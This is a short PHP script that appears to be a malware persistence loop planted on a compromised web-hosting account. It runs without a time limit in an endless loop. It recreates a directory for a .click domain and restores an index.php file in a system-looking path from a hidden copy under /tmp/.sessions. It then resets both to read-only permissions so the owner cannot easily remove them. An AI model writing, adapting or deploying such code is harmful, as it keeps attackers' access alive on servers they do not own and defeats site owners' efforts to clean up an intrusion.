
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/r2745769/public_html/takarazuka-bankin-syuuri.click")){
        mkdir("/home/r2745769/public_html/takarazuka-bankin-syuuri.click");
    }
    if (!file_exists("/lib64/graphviz/index.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L2xpYjY0L2dyYXBodml6aW5kZXgtdGV4dA=="));
        file_put_contents("/lib64/graphviz/index.php", base64_decode($text));
    }
    if (gecko_perm("/lib64/graphviz/index.php") != 0444){
        chmod("/lib64/graphviz/index.php", 0444);
    }
    if (gecko_perm("/home/r2745769/public_html/takarazuka-bankin-syuuri.click") != 0555){
        chmod("/home/r2745769/public_html/takarazuka-bankin-syuuri.click", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
